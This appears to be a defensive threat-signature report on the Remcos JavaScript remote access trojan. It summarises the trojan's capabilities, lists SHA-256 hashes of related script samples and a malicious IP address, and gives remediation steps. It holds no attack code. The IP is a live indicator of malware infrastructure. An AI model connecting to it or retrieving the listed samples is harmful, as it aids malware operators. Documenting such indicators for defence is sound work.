Trojan:JS/Remcos!AMTB - Windows Defender threat signature analysis

=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:JS/Remcos!AMTB
Classification:
Type: Trojan
Platform: JS
Family: Remcos
Detection Type: Concrete (known malware family with identified signatures)
Suffix: !AMTB
Confidence: Very High
False-Positive Risk: Low

Concrete signature match: Trojan (appears legitimate but performs malicious actions), JavaScript platform, family Remcos

Summary:

This is a concrete detection of Trojan:JS/Remcos, a JavaScript-based Remote Access Trojan (RAT). It aims to disable User Account Control (UAC), capture screenshots, and establish command-and-control (C2) communication to download further payloads, enabling extensive surveillance and system control.

Severity: Critical

VDM Static Detection:
Relevant strings associated with this threat:
Known malware associated with this threat:

Filename                                                                   | SHA-256                                                          | Date
---------------------------------------------------------------------------|------------------------------------------------------------------|-----------
1303bf5504a5d6c2a717815dc5a0aa36285cff6438f562d4928c47ec49c6dd64.hta | 1303bf5504a5d6c2a717815dc5a0aa36285cff6438f562d4928c47ec49c6dd64 | 25/12/2025
626ec1fa145051853e353adf624e2cf4227564c156c1c6cf72f2546fc7d25460.ps1 | 626ec1fa145051853e353adf624e2cf4227564c156c1c6cf72f2546fc7d25460 | 25/12/2025
93e255283db179c074c917be8e99cdd4b7aa8cc7c6eea2c811dab9ec980bb83e.ps1 | 93e255283db179c074c917be8e99cdd4b7aa8cc7c6eea2c811dab9ec980bb83e | 25/12/2025
f79c06795ae5144703e4e4d14424f944f26625e77ec20c802fa3ca47cc4659bf.ps1 | f79c06795ae5144703e4e4d14424f944f26625e77ec20c802fa3ca47cc4659bf | 25/12/2025

Remediation Steps:
Immediately isolate the infected system from the network. Perform a full system scan with updated antivirus, remove all detected threats, and block associated malicious IPs (e.g., 185.172.110.217) at the network perimeter. Due to the nature of RATs, a full system reimage is strongly recommended after backing up essential data, and all user credentials used on the compromised machine should be reset.
=== END REPORT ===
This analysis was last updated on 25/12/2025.